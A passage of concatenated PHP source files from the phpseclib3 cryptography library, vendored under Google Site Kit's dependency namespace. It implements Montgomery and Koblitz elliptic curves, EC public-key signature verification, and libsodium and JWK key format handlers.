https://en.wikipedia.org/wiki/Montgomery_curve * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField; use Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer as PrimeInteger; /** * Curves over y^2 = x^3 + a*x + x * * @author Jim Wigginton <terrafrost@php.net> */ class Montgomery extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base { /** * Prime Field Integer factory * * @var PrimeField */ protected $factory; /** * Cofficient for x * * @var object */ protected $a; /** * Constant used for point doubling * * @var object */ protected $a24; /** * The Number Zero * * @var object */ protected $zero; /** * The Number One * * @var object */ protected $one; /** * Base Point * * @var object */ protected $p; /** * The modulo * * @var BigInteger */ protected $modulo; /** * The Order * * @var BigInteger */ protected $order; /** * Sets the modulo */ public function setModulo(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $modulo) { $this->modulo = $modulo; $this->factory = new \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField($modulo); $this->zero = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger()); $this->one = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1)); } /** * Set coefficients a */ public function setCoefficients(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $a) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->a = $this->factory->newInteger($a); $two = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(2)); $four = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(4)); $this->a24 = $this->a->subtract($two)->divide($four); } /** * Set x and y coordinates for the base point * * @param BigInteger|PrimeInteger $x * @param BigInteger|PrimeInteger $y * @return PrimeInteger[] */ public function setBasePoint($x, $y) { switch (\true) { case !$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger && !$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer: throw new \UnexpectedValueException('Google\\Site_Kit_Dependencies\\Argument 1 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\\Integer'); case !$y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger && !$y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer: throw new \UnexpectedValueException('Google\\Site_Kit_Dependencies\\Argument 2 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\\Integer'); } if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->p = [$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger ? $this->factory->newInteger($x) : $x, $y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger ? $this->factory->newInteger($y) : $y]; } /** * Retrieve the base point as an array * * @return array */ public function getBasePoint() { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } /* if (!isset($this->p)) { throw new \RuntimeException('setBasePoint needs to be called before this method'); } */ return $this->p; } /** * Doubles and adds a point on a curve * * See https://tools.ietf.org/html/draft-ietf-tls-curve25519-01#appendix-A.1.3 * * @return FiniteField[][] */ private function doubleAndAddPoint(array $p, array $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer $x1) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!\count($p) || !\count($q)) { return []; } if (!isset($p[1])) { throw new \RuntimeException('Affine coordinates need to be manually converted to XZ coordinates'); } list($x2, $z2) = $p; list($x3, $z3) = $q; $a = $x2->add($z2); $aa = $a->multiply($a); $b = $x2->subtract($z2); $bb = $b->multiply($b); $e = $aa->subtract($bb); $c = $x3->add($z3); $d = $x3->subtract($z3); $da = $d->multiply($a); $cb = $c->multiply($b); $temp = $da->add($cb); $x5 = $temp->multiply($temp); $temp = $da->subtract($cb); $z5 = $x1->multiply($temp->multiply($temp)); $x4 = $aa->multiply($bb); $temp = static::class == \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519::class ? $bb : $aa; $z4 = $e->multiply($temp->add($this->a24->multiply($e))); return [[$x4, $z4], [$x5, $z5]]; } /** * Multiply a point on the curve by a scalar * * Uses the montgomery ladder technique as described here: * * https://en.wikipedia.org/wiki/Elliptic_curve_point_multiplication#Montgomery_ladder * https://github.com/phpecc/phpecc/issues/16#issuecomment-59176772 * * @return array */ public function multiplyPoint(array $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d) { $p1 = [$this->one, $this->zero]; $alreadyInternal = isset($p[1]); $p2 = $this->convertToInternal($p); $x = $p[0]; $b = $d->toBits(); $b = \str_pad($b, 256, '0', \STR_PAD_LEFT); for ($i = 0; $i < \strlen($b); $i++) { $b_i = (int) $b[$i]; if ($b_i) { list($p2, $p1) = $this->doubleAndAddPoint($p2, $p1, $x); } else { list($p1, $p2) = $this->doubleAndAddPoint($p1, $p2, $x); } } return $alreadyInternal ? $p1 : $this->convertToAffine($p1); } /** * Converts an affine point to an XZ coordinate * * From https://hyperelliptic.org/EFD/g1p/auto-montgom-xz.html * * XZ coordinates represent x y as X Z satsfying the following equations: * * x=X/Z * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (empty($p)) { return [clone $this->zero, clone $this->one]; } if (isset($p[1])) { return $p; } $p[1] = clone $this->one; return $p; } /** * Returns the affine point * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToAffine(array $p) { if (!isset($p[1])) { return $p; } list($x, $z) = $p; return [$x->divide($z)]; } } <?php /** * Generalized Koblitz Curves over y^2 = x^3 + b. * * According to http://www.secg.org/SEC2-Ver-1.0.pdf Koblitz curves are over the GF(2**m) * finite field. Both the $a$ and $b$ coefficients are either 0 or 1. However, SEC2 * generalizes the definition to include curves over GF(P) "which possess an efficiently * computable endomorphism". * * For these generalized Koblitz curves $b$ doesn't have to be 0 or 1. Whether or not $a$ * has any restrictions on it is unclear, however, for all the GF(P) Koblitz curves defined * in SEC2 v1.0 $a$ is $0$ so all of the methods defined herein will assume that it is. * * I suppose we could rename the $b$ coefficient to $a$, however, the documentation refers * to $b$ so we'll just keep it. * * If a later version of SEC2 comes out wherein some $a$ values are non-zero we can create a * new method for those. eg. KoblitzA1Prime.php or something. * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField; /** * Curves over y^2 = x^3 + b * * @author Jim Wigginton <terrafrost@php.net> */ class KoblitzPrime extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { /** * Basis * * @var list<array{a: BigInteger, b: BigInteger}> */ protected $basis; /** * Beta * * @var PrimeField\Integer */ protected $beta; // don't overwrite setCoefficients() with one that only accepts one parameter so that // one might be able to switch between KoblitzPrime and Prime more easily (for benchmarking // purposes). /** * Multiply and Add Points * * Uses a efficiently computable endomorphism to achieve a slight speedup * * Adapted from: * https://github.com/indutny/elliptic/blob/725bd91/lib/elliptic/curve/short.js#L219 * * @return int[] */ public function multiplyAddPoints(array $points, array $scalars) { static $zero, $one, $two; if (!isset($two)) { $two = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(2); $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); } if (!isset($this->beta)) { // get roots $inv = $this->one->divide($this->two)->negate(); $s = $this->three->negate()->squareRoot()->multiply($inv); $betas = [$inv->add($s), $inv->subtract($s)]; $this->beta = $betas[0]->compare($betas[1]) < 0 ? $betas[0] : $betas[1]; //echo strtoupper($this->beta->toHex(true)) . "\n"; exit; } if (!isset($this->basis)) { $factory = new \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField($this->order); $tempOne = $factory->newInteger($one); $tempTwo = $factory->newInteger($two); $tempThree = $factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(3)); $inv = $tempOne->divide($tempTwo)->negate(); $s = $tempThree->negate()->squareRoot()->multiply($inv); $lambdas = [$inv->add($s), $inv->subtract($s)]; $lhs = $this->multiplyPoint($this->p, $lambdas[0])[0]; $rhs = $this->p[0]->multiply($this->beta); $lambda = $lhs->equals($rhs) ? $lambdas[0] : $lambdas[1]; $this->basis = static::extendedGCD($lambda->toBigInteger(), $this->order); ///* foreach ($this->basis as $basis) { echo \strtoupper($basis['a']->toHex(\true)) . "\n"; echo \strtoupper($basis['b']->toHex(\true)) . "\n\n"; } exit; //*/ } $npoints = $nscalars = []; for ($i = 0; $i < \count($points); $i++) { $p = $points[$i]; $k = $scalars[$i]->toBigInteger(); // begin split list($v1, $v2) = $this->basis; $c1 = $v2['b']->multiply($k); list($c1, $r) = $c1->divide($this->order); if ($this->order->compare($r->multiply($two)) <= 0) { $c1 = $c1->add($one); } $c2 = $v1['b']->negate()->multiply($k); list($c2, $r) = $c2->divide($this->order); if ($this->order->compare($r->multiply($two)) <= 0) { $c2 = $c2->add($one); } $p1 = $c1->multiply($v1['a']); $p2 = $c2->multiply($v2['a']); $q1 = $c1->multiply($v1['b']); $q2 = $c2->multiply($v2['b']); $k1 = $k->subtract($p1)->subtract($p2); $k2 = $q1->add($q2)->negate(); // end split $beta = [$p[0]->multiply($this->beta), $p[1], clone $this->one]; if (isset($p['naf'])) { $beta['naf'] = \array_map(function ($p) { return [$p[0]->multiply($this->beta), $p[1], clone $this->one]; }, $p['naf']); $beta['nafwidth'] = $p['nafwidth']; } if ($k1->isNegative()) { $k1 = $k1->negate(); $p = $this->negatePoint($p); } if ($k2->isNegative()) { $k2 = $k2->negate(); $beta = $this->negatePoint($beta); } $pos = 2 * $i; $npoints[$pos] = $p; $nscalars[$pos] = $this->factory->newInteger($k1); $pos++; $npoints[$pos] = $beta; $nscalars[$pos] = $this->factory->newInteger($k2); } return parent::multiplyAddPoints($npoints, $nscalars); } /** * Returns the numerator and denominator of the slope * * @return FiniteField[] */ protected function doublePointHelper(array $p) { $numerator = $this->three->multiply($p[0])->multiply($p[0]); $denominator = $this->two->multiply($p[1]); return [$numerator, $denominator]; } /** * Doubles a jacobian coordinate on the curve * * See http://hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-0.html#doubling-dbl-2009-l * * @return FiniteField[] */ protected function jacobianDoublePoint(array $p) { list($x1, $y1, $z1) = $p; $a = $x1->multiply($x1); $b = $y1->multiply($y1); $c = $b->multiply($b); $d = $x1->add($b); $d = $d->multiply($d)->subtract($a)->subtract($c)->multiply($this->two); $e = $this->three->multiply($a); $f = $e->multiply($e); $x3 = $f->subtract($this->two->multiply($d)); $y3 = $e->multiply($d->subtract($x3))->subtract($this->eight->multiply($c)); $z3 = $this->two->multiply($y1)->multiply($z1); return [$x3, $y3, $z3]; } /** * Doubles a "fresh" jacobian coordinate on the curve * * See http://hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-0.html#doubling-mdbl-2007-bl * * @return FiniteField[] */ protected function jacobianDoublePointMixed(array $p) { list($x1, $y1) = $p; $xx = $x1->multiply($x1); $yy = $y1->multiply($y1); $yyyy = $yy->multiply($yy); $s = $x1->add($yy); $s = $s->multiply($s)->subtract($xx)->subtract($yyyy)->multiply($this->two); $m = $this->three->multiply($xx); $t = $m->multiply($m)->subtract($this->two->multiply($s)); $x3 = $t; $y3 = $s->subtract($t); $y3 = $m->multiply($y3)->subtract($this->eight->multiply($yyyy)); $z3 = $this->two->multiply($y1); return [$x3, $y3, $z3]; } /** * Tests whether or not the x / y values satisfy the equation * * @return boolean */ public function verifyPoint(array $p) { list($x, $y) = $p; $lhs = $y->multiply($y); $temp = $x->multiply($x)->multiply($x); $rhs = $temp->add($this->b); return $lhs->equals($rhs); } /** * Calculates the parameters needed from the Euclidean algorithm as discussed at * http://diamond.boisestate.edu/~liljanab/MATH308/GuideToECC.pdf#page=148 * * @param BigInteger $u * @param BigInteger $v * @return BigInteger[] */ protected static function extendedGCD(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $u, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $v) { $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); $zero = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(); $a = clone $one; $b = clone $zero; $c = clone $zero; $d = clone $one; $stop = $v->bitwise_rightShift($v->getLength() >> 1); $a1 = clone $zero; $b1 = clone $zero; $a2 = clone $zero; $b2 = clone $zero; $postGreatestIndex = 0; while (!$v->equals($zero)) { list($q) = $u->divide($v); $temp = $u; $u = $v; $v = $temp->subtract($v->multiply($q)); $temp = $a; $a = $c; $c = $temp->subtract($a->multiply($q)); $temp = $b; $b = $d; $d = $temp->subtract($b->multiply($q)); if ($v->compare($stop) > 0) { $a0 = $v; $b0 = $c; } else { $postGreatestIndex++; } if ($postGreatestIndex == 1) { $a1 = $v; $b1 = $c->negate(); } if ($postGreatestIndex == 2) { $rhs = $a0->multiply($a0)->add($b0->multiply($b0)); $lhs = $v->multiply($v)->add($b->multiply($b)); if ($lhs->compare($rhs) <= 0) { $a2 = $a0; $b2 = $b0->negate(); } else { $a2 = $v; $b2 = $c->negate(); } break; } } return [['a' => $a1, 'b' => $b1], ['a' => $a2, 'b' => $b2]]; } } <?php /** * EC Public Key * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\PKCS1; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Signature\ASN1 as ASN1Signature; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * EC Public Key * * @author Jim Wigginton <terrafrost@php.net> */ final class PublicKey extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC implements \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey { use Common\Traits\Fingerprint; /** * Verify a signature * * @see self::verify() * @param string $message * @param string $signature * @return mixed */ public function verify($message, $signature) { if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException('Montgomery Curves cannot be used to create signatures'); } $shortFormat = $this->shortFormat; $format = $this->sigFormat; if ($format === \false) { return \false; } $order = $this->curve->getOrder(); if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { if ($shortFormat == 'SSH2') { list(, $signature) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $signature); } if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 && self::$engines['libsodium'] && !isset($this->context)) { return \sodium_crypto_sign_verify_detached($signature, $message, $this->toString('libsodium')); } $curve = $this->curve; if (\strlen($signature) != 2 * $curve::SIZE) { return \false; } $R = \substr($signature, 0, $curve::SIZE); $S = \substr($signature, $curve::SIZE); try { $R = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\PKCS1::extractPoint($R, $curve); $R = $this->curve->convertToInternal($R); } catch (\Exception $e) { return \false; } $S = \strrev($S); $S = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($S, 256); if ($S->compare($order) >= 0) { return \false; } $A = $curve->encodePoint($this->QA); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519) { $dom2 = !isset($this->context) ? '' : 'SigEd25519 no Ed25519 collisions' . "\x00" . \chr(\strlen($this->context)) . $this->context; } else { $context = isset($this->context) ? $this->context : ''; $dom2 = 'SigEd448' . "\x00" . \chr(\strlen($context)) . $context; } $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash($curve::HASH); $k = $hash->hash($dom2 . \substr($signature, 0, $curve::SIZE) . $A . $message); $k = \strrev($k); $k = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($k, 256); list(, $k) = $k->divide($order); $qa = $curve->convertToInternal($this->QA); $lhs = $curve->multiplyPoint($curve->getBasePoint(), $S); $rhs = $curve->multiplyPoint($qa, $k); $rhs = $curve->addPoint($rhs, $R); $rhs = $curve->convertToAffine($rhs); return $lhs[0]->equals($rhs[0]) && $lhs[1]->equals($rhs[1]); } $params = $format::load($signature); if ($params === \false || \count($params) != 2) { return \false; } \extract($params); if (self::$engines['OpenSSL'] && \in_array($this->hash->getHash(), \openssl_get_md_methods())) { $sig = $format != 'ASN1' ? \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Signature\ASN1::save($r, $s) : $signature; $result = \openssl_verify($message, $sig, $this->toString('PKCS8', ['namedCurve' => \false]), $this->hash->getHash()); if ($result != -1) { return (bool) $result; } } $n_1 = $order->subtract(self::$one); if (!$r->between(self::$one, $n_1) || !$s->between(self::$one, $n_1)) { return \false; } $e = $this->hash->hash($message); $e = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($e, 256); $Ln = $this->hash->getLength() - $order->getLength(); $z = $Ln > 0 ? $e->bitwise_rightShift($Ln) : $e; $w = $s->modInverse($order); list(, $u1) = $z->multiply($w)->divide($order); list(, $u2) = $r->multiply($w)->divide($order); $u1 = $this->curve->convertInteger($u1); $u2 = $this->curve->convertInteger($u2); list($x1, $y1) = $this->curve->multiplyAddPoints([$this->curve->getBasePoint(), $this->QA], [$u1, $u2]); $x1 = $x1->toBigInteger(); list(, $x1) = $x1->divide($order); return $x1->equals($r); } /** * Returns the public key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePublicKey'); return $type::savePublicKey($this->curve, $this->QA, $options); } } <?php /** * libsodium Key Handler * * Different NaCl implementations store the key differently. * https://blog.mozilla.org/warner/2011/11/29/ed25519-keys/ elaborates. * libsodium appears to use the same format as SUPERCOP. * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * libsodium Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class libsodium { use Common; /** * Is invisible flag * */ const IS_INVISIBLE = \true; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { switch (\strlen($key)) { case 32: $public = $key; break; case 64: $private = \substr($key, 0, 32); $public = \substr($key, -32); break; case 96: $public = \substr($key, -32); if (\substr($key, 32, 32) != $public) { throw new \RuntimeException('Keys with 96 bytes should have the 2nd and 3rd set of 32 bytes match'); } $private = \substr($key, 0, 32); break; default: throw new \RuntimeException('libsodium keys need to either be 32 bytes long, 64 bytes long or 96 bytes long'); } $curve = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519(); $components = ['curve' => $curve]; if (isset($private)) { $arr = $curve->extractSecret($private); $components['dA'] = $arr['dA']; $components['secret'] = $arr['secret']; } $components['QA'] = isset($public) ? self::extractPoint($public, $curve) : $curve->multiplyPoint($curve->getBasePoint(), $components['dA']); return $components; } /** * Convert an EC public key to the appropriate format * * @param Ed25519 $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 $curve, array $publicKey) { return $curve->encodePoint($publicKey); } /** * Convert a private key to the appropriate format. * * @param BigInteger $privateKey * @param Ed25519 $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $privateKey, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 $curve, array $publicKey, $secret = null, $password = '') { if (!isset($secret)) { throw new \RuntimeException('Private Key does not have a secret set'); } if (\strlen($secret) != 32) { throw new \RuntimeException('Private Key secret is not of the correct length'); } if (!empty($password) && \is_string($password)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException('libsodium private keys do not support encryption'); } return $secret . $curve->encodePoint($publicKey); } } <?php /** * JSON Web Key (RFC7517 / RFC8037) Formatted EC Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\JWK as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp256k1; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp256r1; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp384r1; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp521r1; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * JWK Formatted EC Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class JWK extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\JWK { use Common; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); switch ($key->kty) { case 'EC': switch ($key->crv) { case 'P-256': case 'P-384': case 'P-521': case 'secp256k1': break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Only P-256, P-384, P-521 and secp256k1 curves are accepted (' . $key->crv . ' provided)'); } break; case 'OKP': switch ($key->crv) { case 'Ed25519': case 'Ed448': break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Only Ed25519 and Ed448 curves are accepted (' . $key->crv . ' provided)'); } break; default: throw new \Exception('Only EC and OKP JWK keys are supported'); } $curve = '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\' . \str_replace('P-', 'nistp', $key->crv); $curve = new $curve(); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { $QA = self::extractPoint(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_decode($key->x), $curve); if (!isset($key->d)) { return \compact('curve', 'QA'); } $arr = $curve->extractSecret(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_decode($key->d)); return \compact('curve', 'QA') + $arr; } $QA = [$curve->convertInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_decode($key->x), 256)), $curve->convertInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_decode($key->y), 256))]; if (!$curve->verifyPoint($QA)) { throw new \RuntimeException('Unable to verify that point exists on curve'); } if (!isset($key->d)) { return \compact('curve', 'QA'); } $dA = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_decode($key->d), 256); $curve->rangeCheck($dA); return \compact('curve', 'dA', 'QA'); } /** * Returns the alias that corresponds to a curve * * @return string */ private static function getAlias(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve) { switch (\true) { case $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp256r1: return 'P-256'; case $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp384r1: return 'P-384'; case $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp521r1: return 'P-521'; case $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp256k1: return 'secp256k1'; } $reflect = new \ReflectionClass($curve); $curveName = $reflect->isFinal() ? $reflect->getParentClass()->getShortName() : $reflect->getShortName(); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException("{$curveName} is not a supported curve"); } /** * Return the array superstructure for an EC public key * * @param BaseCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @return array */ private static function savePublicKeyHelper(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey) { if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { return ['kty' => 'OKP', 'crv' => $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 ? 'Ed25519' : 'Ed448', 'x' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($curve->encodePoint($publicKey))]; } return ['kty' => 'EC', 'crv' => self::getAlias($curve), 'x' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($publicKey[0]->toBytes()), 'y' => \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($publicKey[1]->toBytes())]; } /** * Convert an EC public key to the appropriate format * * @param BaseCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey, array $options = []) { $key = self::savePublicKeyHelper($curve, $publicKey); return self::wrapKey($key, $options); } /** * Convert a private key to the appropriate format. * * @param BigInteger $privateKey * @param Ed25519 $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $privateKey, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey, $secret = null, $password = '', array $options = []) { $key = self::savePublicKeyHelper($curve, $publicKey); $key['d'] = $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards ? $secret : $privateKey->toBytes(); $key['d'] = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64url_encode($key['d']); return self::wrapKey($key, $options); } } <?php /** * PKCS#8 Formatted EC Key Handler * * PHP version 5 * * Processes keys with the following headers: * * -----BEGIN ENCRYPTED PRIVATE KEY----- * -----BEGIN PRIVATE KEY----- * -----BEGIN PUBLIC KEY----- * * Analogous to ssh-keygen's pkcs8 format (as specified by -m). Although PKCS8 * is specific to private keys it's basically creating a DER-encoded wrapper * for keys. This just extends that same concept to public keys (much like ssh-keygen) * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use 